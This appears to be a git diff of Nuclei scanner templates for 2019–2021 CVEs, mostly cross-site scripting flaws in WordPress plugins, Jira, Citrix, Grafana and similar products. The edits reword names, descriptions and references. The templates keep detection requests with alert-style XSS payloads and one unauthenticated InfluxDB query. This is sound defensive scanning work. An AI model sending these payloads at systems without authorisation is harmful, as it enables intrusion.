     - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
     - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html
     - https://knassar702.github.io/cve/neon/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20141
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -33,3 +34,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-20210.yaml

@@ -1,16 +1,16 @@
 id: CVE-2019-20210
 
 info:
-  name: CTHthemes CityBook < 2.3.4 - Reflected XSS
+  name: WordPress CTHthemes - Cross-Site Scripting
   author: edoardottt
   severity: medium
   description: |
-    The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query.
+    WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
   reference:
     - https://wpscan.com/vulnerability/10013
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
     - https://wpvulndb.com/vulnerabilities/10018
     - https://cxsecurity.com/issue/WLB-2019120112
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -40,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-20933.yaml

@@ -1,5 +1,5 @@
-id: CVE-2019-20933
-
+id: CVE-2019-20933
+
 info:
   name: Authentication Bypass InfluxDB
   author: pussycat0x,c-sh0
@@ -20,20 +20,20 @@ info:
     shodan-dork: InfluxDB
     verified: "true"
   tags: unauth,db,influxdb,misconfig
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"results":'
-          - '"name":"databases"'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"results":'
+          - '"name":"databases"'
+        condition: and
+
+      - type: status
+        status:
+          - 200

cves/2019/CVE-2019-3402.yaml

@@ -1,13 +1,14 @@
 id: CVE-2019-3402
 
 info:
-  name: Jira - Reflected XSS using searchOwnerUserName parameter.
+  name: Jira <8.1.1 - Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
+  description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
   reference:
     - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
     - https://jira.atlassian.com/browse/JRASERVER-69243
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-3402
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -30,4 +31,6 @@ requests:
       - type: word
         words:
           - "<script>alert(1)</script>"
-        part: body
+        part: body
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-3911.yaml

@@ -1,14 +1,12 @@
 id: CVE-2019-3911
-
 info:
-  name: LabKey Server < 18.3.0 - XSS
+  name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting
   author: princechaddha
   severity: medium
-  description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
-    parameter in the /__r2/query endpoints.
+  description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
   reference:
     - https://www.tenable.com/security/research/tra-2019-03
-    - https://www.cvedetails.com/cve/CVE-2019-3911
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-3911
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -17,24 +15,22 @@ info:
   metadata:
     shodan-query: 'Server: Labkey'
   tags: cve,cve2019,xss,labkey,tenable
-
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL'
-
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - "</script><script>alert(document.domain)</script>"
-
       - type: word
         part: header
         words:
           - text/html
-
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/09/07

cves/2019/CVE-2019-7219.yaml

@@ -1,26 +1,25 @@
 id: CVE-2019-7219
-
 info:
-  name: Zarafa WebApp Reflected XSS
+  name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
   author: pdteam
   severity: medium
   description: |
-    Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
+    Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
   reference:
     - https://github.com/verifysecurity/CVE-2019-7219
     - https://stash.kopano.io/repos?visibility=public
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-7219
+  remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-7219
     cwe-id: CWE-79
   tags: cve,cve2019,zarafa,xss
-
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
-
     matchers-condition: and
     matchers:
       - type: word
@@ -31,7 +30,8 @@ requests:
         part: header
         words:
           - "text/html"
-
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/09/07

cves/2019/CVE-2019-7543.yaml

@@ -1,10 +1,10 @@
 id: CVE-2019-7543
 
 info:
-  name: KindEditor 4.1.11, the php/demo.php - (XSS)
+  name: KindEditor 4.1.11 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: KindEditor 4.1.11, the php/demo.php content1 parameter has a reflected Cross-site Scripting (XSS) vulnerability.
+  description: KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter.
   reference:
     - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor
     - https://nvd.nist.gov/vuln/detail/CVE-2019-7543
@@ -36,3 +36,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-8937.yaml

@@ -1,15 +1,15 @@
 id: CVE-2019-8937
 
 info:
-  name: HotelDruid 2.3.0 - XSS
+  name: HotelDruid 2.3.0 - Cross-Site Scripting
   author: LogicalHunter
   severity: medium
-  description: HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
+  description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
   reference:
     - https://www.exploit-db.com/exploits/46429
-    - https://www.exploit-db.com/exploits/46429/
     - https://sourceforge.net/projects/hoteldruid/
     - http://packetstormsecurity.com/files/151779/HotelDruid-2.3-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-8937
   metadata:
     verified: true
   classification:
@@ -44,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-9955.yaml

@@ -1,17 +1,16 @@
 id: CVE-2019-9955
 
 info:
-  name: Zyxel - Reflected Cross-site Scripting
+  name: Zyxel - Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security
-    firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter.
+  description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
   reference:
     - http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
-    - http://seclists.org/fulldisclosure/2019/Apr/22
     - https://www.exploit-db.com/exploits/46706/
     - https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
     - https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9955
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -31,3 +30,5 @@ requests:
           - "\";alert('1');//"
           - "<title>Welcome</title>"
         condition: and
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-9978.yaml

@@ -1,15 +1,16 @@
 id: CVE-2019-9978
 
 info:
-  name: WordPress social-warfare RFI
+  name: WordPress Social Warfare <3.5.3 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
-  description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
+  description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.
   reference:
     - https://github.com/mpgn/CVE-2019-9978
     - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
     - https://www.pluginvulnerabilities.com/2019/03/21/full-disclosure-of-settings-change-persistent-cross-site-scripting-xss-vulnerability-in-social-warfare/
     - https://www.cybersecurity-help.cz/vdb/SB2019032105
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9978
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -32,3 +33,5 @@ requests:
         part: interactsh_protocol
         words:
           - "http"
+
+# Enhanced by mp on 2022/08/31

cves/2020/CVE-2020-11110.yaml

@@ -1,15 +1,15 @@
 id: CVE-2020-11110
 
 info:
-  name: Grafana Unauthenticated Stored XSS
+  name: Grafana <=6.7.1 - Cross-Site Scripting
   author: emadshanab
   severity: medium
-  description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
+  description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
   reference:
     - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
     - https://github.com/grafana/grafana/blob/master/CHANGELOG.md
     - https://security.netapp.com/advisory/ntap-20200810-0002/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
   remediation: This issue can be resolved by updating Grafana to the latest version.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -57,3 +57,5 @@ requests:
         group: 1
         regex:
           - '"url":"([a-z:/0-9A-Z]+)"'
+
+# Enhanced by mp on 2022/09/02

cves/2020/CVE-2020-11930.yaml

@@ -1,16 +1,17 @@
 id: CVE-2020-11930
 
 info:
-  name: WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS
+  name: WordPress GTranslate <2.8.52 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
   description: |
-    The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
+    WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
   reference:
     - https://wpscan.com/vulnerability/10181
     - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
     - https://plugins.trac.wordpress.org/changeset/2245581/gtranslate
     - https://plugins.trac.wordpress.org/changeset/2245591/gtranslate
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11930
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02

cves/2020/CVE-2020-12054.yaml

@@ -1,14 +1,16 @@
 id: CVE-2020-12054
 
 info:
-  name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
+  name: WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
+  description: |
+    WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.
   reference:
     - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
     - https://wpvulndb.com/vulnerabilities/10184
     - https://cxsecurity.com/issue/WLB-2020040144
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-12054
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,4 +39,6 @@ requests:
 
       - type: status
         status:
-          - 200
+          - 200
+
+# Enhanced by mp on 2022/09/02

cves/2020/CVE-2020-14408.yaml

@@ -1,10 +1,10 @@
 id: CVE-2020-14408
 
 info:
-  name: Agentejo Cockpit 0.10.2 - Reflected XSS
+  name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector.
+  description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -13,7 +13,6 @@ info:
   reference:
     - https://github.com/agentejo/cockpit/issues/1310
     - https://nvd.nist.gov/vuln/detail/CVE-2020-14408
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408
   metadata:
     verified: true
   tags: cve,cve2022,cockpit,agentejo,xss,oss
@@ -39,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02

cves/2020/CVE-2020-5191.yaml

@@ -1,15 +1,15 @@
 id: CVE-2020-5191
 
 info:
-  name: Hospital Management System 4.0 - Cross-Site Scripting
+  name: PHPGurukul Hospital Management System - Cross-Site Scripting
   author: TenBird
   severity: medium
   description: |
-    PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
+    PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
   reference:
     - https://www.exploit-db.com/exploits/47841
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-5191
     - https://phpgurukul.com/hospital-management-system-in-php/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5191
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -53,3 +53,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02

cves/2020/CVE-2020-8115.yaml

@@ -1,21 +1,21 @@
 id: CVE-2020-8115
-
 info:
-  name: Revive Adserver XSS
+  name: Revive Adserver <=5.0.3 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
   description: |
-    A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.
+    Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
   reference:
     - https://hackerone.com/reports/775693
     - https://www.revive-adserver.com/security/revive-sa-2020-001/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8115
+  remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-8115
     cwe-id: CWE-79
   tags: cve,cve2020,xss,hackerone
-
 requests:
   - method: GET
     path:
@@ -28,4 +28,6 @@ requests:
       - type: regex
         part: body
         regex:
-          - (?mi)window\.location\.replace\(".*alert\(1337\)
+          - (?mi)window\.location\.replace\(".*alert\(1337\)
+
+# Enhanced by cs on 2022/09/07

cves/2020/CVE-2020-8191.yaml

@@ -1,13 +1,14 @@
 id: CVE-2020-8191
 
 info:
-  name: Citrix ADC & NetScaler Gateway Reflected XSS
+  name: Citrix ADC/Gateway - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
   description: |
-    Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).
+    Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
   reference:
     - https://support.citrix.com/article/CTX276688
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8191
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -39,4 +40,6 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
+        part: header
+
+# Enhanced by mp on 2022/09/02

cves/2020/CVE-2020-8512.yaml

@@ -1,15 +1,16 @@
 id: CVE-2020-8512
 
 info:
-  name: IceWarp WebMail XSS
+  name: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting
   author: pdteam,dwisiswant0
   severity: medium
-  description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
+  description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
   reference:
     - https://www.exploit-db.com/exploits/47988
     - https://twitter.com/sagaryadav8742/status/1275170967527006208
     - https://cxsecurity.com/issue/WLB-2020010205
     - https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8512
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +37,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/02

cves/2020/CVE-2020-9036.yaml

@@ -1,10 +1,10 @@
 id: CVE-2020-9036
 
 info:
-  name: Jeedom through 4.0.38 allows XSS
+  name: Jeedom <=4.0.38 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Jeedom through 4.0.38 allows XSS.
+  description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
   reference:
     - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-9036
@@ -35,3 +35,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/09/02

cves/2020/CVE-2020-9344.yaml

@@ -1,14 +1,15 @@
 id: CVE-2020-9344
 
 info:
-  name: Jira Subversion ALM for enterprise XSS
+  name: Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.
+  description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations.
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344
     - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin
     - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13483
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -39,4 +40,6 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
+        part: header
+
+# Enhanced by md on 2022/09/02

cves/2020/CVE-2020-9496.yaml

@@ -1,15 +1,16 @@
 id: CVE-2020-9496
 
 info:
-  name: Apache OFBiz XML-RPC Java Deserialization
+  name: Apache OFBiz 17.12.03 - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
-  description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
+  description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request.
   reference:
     - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html
     - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html
     - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
     - https://s.apache.org/l0994
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9496
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -43,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/09/02

cves/2021/CVE-2021-1472.yaml

@@ -1,4 +1,4 @@
-id: cisco-rv-series-rce
+id: CVE-2021-1472
 
 info:
   name: Cisco Small Business RV Series - Authentication Bypass and Command Injection

cves/2021/CVE-2021-20137.yaml

@@ -1,19 +1,19 @@
 id: CVE-2021-20137
 
 info:
-  name: Gryphon Tower - Reflected XSS
+  name: Gryphon Tower - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: A reflected cross-site scripting vulnerability exists in the url parameter of the /cgi-bin/luci/site_access/ page on the Gryphon Tower router's web interface. An attacker could exploit this issue by tricking a user into following a specially crafted link, granting the attacker javascript execution in the context of the victim's browser.
+  description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-20137
     cwe-id: CWE-79
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-20137
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137
     - https://www.tenable.com/security/research/tra-2021-51
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20137
   tags: xss,tenable,cve,cve2021,gryphon
 
 requests:
@@ -37,4 +37,6 @@ requests:
         words:
           - 'onfocus=alert(document.domain) autofocus=1>'
           - 'Send Access Request URL'
-        condition: and
+        condition: and
+
+# Enhanced by md on 2022/09/02

cves/2021/CVE-2021-20792.yaml

@@ -1,15 +1,15 @@
 id: CVE-2021-20792
 
 info:
-  name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
+  name: WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
+  description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.
   reference:
     - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-20792
     - https://quizandsurveymaster.com/
     - https://jvn.jp/en/jp/JVN65388002/index.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20792
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -48,3 +48,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-21799.yaml

@@ -1,14 +1,13 @@
 id: CVE-2021-21799
 
 info:
-  name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting
+  name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality.
+    Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21799
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -40,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-21800.yaml

@@ -1,14 +1,13 @@
 id: CVE-2021-21800
 
 info:
-  name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting
+  name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the ssh_form.php script functionality.
+    Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21800
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -40,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02

cves/2021/CVE-2021-21801.yaml

@@ -1,13 +1,13 @@
 id: CVE-2021-21801
 
 info:
-  name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS)
+  name: Advantech R-SeeNet - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
-    arbitrary JavaScript code execution.
+  description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
   reference:
